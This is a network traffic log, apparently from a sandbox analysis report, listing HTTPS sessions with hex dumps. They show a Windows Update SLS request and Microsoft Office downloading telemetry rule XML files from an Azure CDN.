                                                                                                                                      2024-10-07 01:22:57 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xNGWLB7eDUzHSk&MD=4dvuXYOy HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                      2024-10-07 01:22:57 UTC560INHTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                      MS-CorrelationId: 65cb16f5-fd38-4cb0-9fd5-5d991b93bb08
                                                                                                                                      MS-RequestId: e2f61a06-6d9b-46ee-ba3b-319ceb50f1c8
                                                                                                                                      MS-CV: jDhI1oEM8U6BDxAg.0
                                                                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:57 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 30005
                                                                                                                                      2024-10-07 01:22:57 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                      2024-10-07 01:22:57 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      3192.168.2.44974213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:58 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:58 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 408
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                                      x-ms-request-id: b27588a3-a01e-003d-6001-1798d7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012258Z-1657d5bbd48vlsxxpe15ac3q7n00000002u0000000005xhp
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:58 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      4192.168.2.44973813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:58 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:58 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:58 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 3788
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                      x-ms-request-id: 4545068c-701e-0050-0e05-176767000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012258Z-1657d5bbd482krtfgrg72dfbtn00000002n0000000002az8
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:58 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      5192.168.2.44974113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:58 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:58 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:58 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2160
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                      x-ms-request-id: c59bb0f9-701e-0097-2d01-17b8c1000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012258Z-1657d5bbd48p2j6x2quer0q02800000002w000000000tpu5
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:58 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      6192.168.2.44973913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:58 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:58 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 450
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                      x-ms-request-id: d4448e94-101e-00a2-2703-179f2e000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012258Z-1657d5bbd48f7nlxc7n5fnfzh000000002gg000000002acd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:58 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      7192.168.2.44974013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:58 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:58 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:58 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2980
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                      x-ms-request-id: 8aaf7b13-d01e-0028-46fd-167896000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012258Z-1657d5bbd4824mj9d6vp65b6n40000000330000000000fve
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:58 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      8192.168.2.44974313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 474
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                      x-ms-request-id: 3ea0840d-701e-0053-1012-173a0a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48cpbzgkvtewk0wu000000002zg0000000004th
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:59 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      9192.168.2.44974513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 471
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                      x-ms-request-id: 73fc0cc0-d01e-008e-5fee-16387a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48p2j6x2quer0q02800000002y000000000gx9z
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:59 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      10192.168.2.44974613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 632
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                      x-ms-request-id: 15158de7-401e-0029-4b00-179b43000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48762wn1qw4s5sd3000000002kg00000000pmk0
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:59 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      11192.168.2.44974713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 467
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                      x-ms-request-id: 87fc294c-201e-0051-40f3-167340000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48t66tjar5xuq22r800000002p000000000t2cb
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
